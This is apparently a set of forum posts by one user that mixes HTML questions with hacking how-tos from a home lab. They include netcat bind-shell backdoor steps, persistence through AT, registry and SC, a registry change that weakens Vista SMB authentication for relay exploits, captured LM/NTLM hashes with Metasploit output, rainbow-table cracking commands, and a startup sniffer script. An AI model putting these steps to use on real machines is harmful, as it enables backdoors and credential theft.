Bigmac

  1. this is just what I was looking for ... if I was to move these source files back and forth from different servers and locations I would only need to change the base address
  2. #page source
     VARlocation = "c:/html/sc/site/"
     <TITLE>My Home Page</TITLE>
     <img src= VARlocation & "/pictures/abc.jpg">
     <a href= VARlocation & "/someother/location.html">
     <body> stuff here </body>

     If you look at that improper syntax maybe you will see what I'm trying to do... I'm going to script a small website, at the top of each source file I would like to be able to change a variable to a new source location... any tips???
  3. my bad spelling is a big problem... I'm a spell check retard...
  4. a hacker will use the AT command to schedule tasks, this is one way of keeping your trojan, shell or backdoor always running on the client... a hacker will use the registry to keep a trojan, shell or backdoor starting up when windows first boots up... a hacker will also use the SC command to start a trojan up as a service...

     here is a small set of instructions for you, that is if you don't know how to use netcat as remote control... you need 2 computers for this... both computers need netcat located somewhere on the hard drive (at least the victim does)... for this test, place netcat on computer 1 in this directory

     c:/hacked/nc.exe

     this will be your victim

     on the victim computer open a command prompt and execute these 3 commands

     ipconfig
     cd/hacked/
     nc -l -p 666 -e cmd.exe -d

     this will start netcat in a stealthy way, if you check the task manager you will see netcat is running...

     now, from the attacking computer you need to execute this command, take note of the IP address of the victim's ipconfig

     telnet 192.168.1.5 666

     netcat is your remote control (shell, backdoor)

     you need to understand why you would need to use one of the tools above to keep netcat running...
  5. knowing how to do your own research will pay off in the end... search online for any and every bit of documentation on the subject of netcat... I think that once you master this tool to its full extent it will be like wetting your pickle for the first time... the at command is what you use with windows to schedule tasks...
  6. I was trying to add some spice to the mix... most people ask what that is and how they can do that to their computers...
  7. This was just for fun... it's not really a tutorial but more of a demonstration... I think I did a good job with this video... the music is epic Lol... cracked WEP... filter traffic with ettercap and force SMB authentication... SMB relay exploit... upload tools for a secure back door... enjoy and let me know what you think... I'm going to talk to Adrian Crenshaw and see if he would like this video on his site... direct link http://vimeo.com/5154318
  8. it's just another basic exploit... I reset compiz config and tested each plugin with recordmydesktop... changing the settings with each plugin helps... when my video card overheats and I start recording the screen flickers... I was going to upload vlcplayer to the exploited box and start eavesdropping on all media devices on a live stream but I could not get backtrack to connect to this data stream... vls player keeps giving me errors on backtrack ,-(
  9. I was bored so I did a screen capture today... this video is fresh from recordmydesktop and encoded with ffmpeg... I'm going to add music from the movie 'hackers' and I'll add some subtitles and zooming... Just a preview... http://vimeo.com/5041659 It's not really a tutorial, I'm hoping I can add some spunk and pizzazz to the video... maybe I can impress some friends, most people won't even know what's going on... here is the song I plan on adding to the video...
  10. thanks for the tables... I have installed ophcrack and unzipped some tables... here is a pwdump hash that I cracked with no problem.

      6:1014:0b9c5cab5e9c5de1aad3b435b51404ee:a00aa4b31f99caa9260484fefbaceadb:::

      Now, the problem. the hash I got from metasploit capture/server/smb looks like this

      1:1234:24a18757a032db8aee49b4b8d2883ae0b798afe64f2f87e9:24a18757a032db8aee49b4b8d2883ae0b798afe64f2f87e9:::

      I can trim the hash to the proper size but it won't get cracked... can I use these tables with rainbowcrack? they're not in the right format so I'm sure they won't work but it don't hurt to ask or??? can I use ophcrack to crack a specific string like-->

      ophcrack -d /root/tables/ -H 9283rh9o38rhf9u8hduf9s8hiv
  11. Ok, so I made a change to the registry in windows vista... now the correct lanman hash will be sent out on the network and exploiting and cracking is now possible...

      HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\LMCompatibilityLevel

      by default windows vista has set this to 3, just open up regedit to that location and change the value to a 1...

      windows/smb/smb_relay
      windows/smb/psexec

      both these exploits will now work with no problem... so, I plan on making a video, I still would like to crack the hash for tutorial purposes, I'm running backtrack from a usb stick and only have about 2-3 gigs available, I need to generate a sufficient rainbow table to fit on the stick that can crack the hash containing the password ribbit

      any comments or spoon feeding would be a big help with creating these tables...
  12. I'm about to make a video tutorial, later on I'll worry about building a huge rainbow table but for now I just need to crack this smb hash during a screen capture...

      http://carnal0wnage.blogspot.com/2009/04/u...fer-module.html
      http://www.chekmate.org/wiki/index.php/Tut..._rainbow_tables

      so, I have captured the smb authentication lmhash... I need to generate a quick table and crack the first 16 bits of the hash... 6 digit alpha password = ribbit

      rtgen lm alpha 6 6 0 2100 80000 test

      so, this one table should work right? 6 - 6 letter password?

      :edit: it looks like this is the wrong hash... but I'm not sure...

      [*] Captured 192.168.1.5:60247 riebugs-PC\rie bugs LMHASH:36f06f7cf0d7a4749aef12984c20bf0d974adc005d0aec5f NTHASH:fe124399bfe37b130ce96e0c4b4a16f501010000000000004b9a7e8568e2c901974adc005d0aec5f0000000002000000 0000000000000000 OS: LM:
      [*] Captured 192.168.1.5:60247 riebugs-PC\rie bugs LMHASH:c4814ba02210583fc55a4b0b8eeb21af135142161dcf85ea NTHASH:791178e26ce7963640f419c7f154b6ee01010000000000006b71968568e2c901135142161dcf85ea0000000002000000 0000000000000000 OS: LM:
      [*] Captured 192.168.1.5:60249 riebugs-PC\rie bugs LMHASH:ab5f2b3f6722df7dddebb097d0c69af41cd90192c53a4a29 NTHASH:32640ab633762201021d69291a1f3f14010100000000000063bea78e68e2c9011cd90192c53a4a290000000002000000 0000000000000000 OS: LM:

      http://www.milw0rm.com/cracker/insert.php I found this. but I can't crack the hash, I tried the first 16
  13. Hmmm... knoppix has cinelerra already installed...
  14. shoot.. I don't remember this command but I think it goes like this...

      netstat -nb -t 10 > log.txt
      netstat -nb -t 10 | log.txt
  15. windump.exe

      make a batch script and add it to your startup registry... you would have to figure out how to name each log with a date, year and time, got batch script skills? I forget the windump commands

      @echo off
      windump -o logg.txt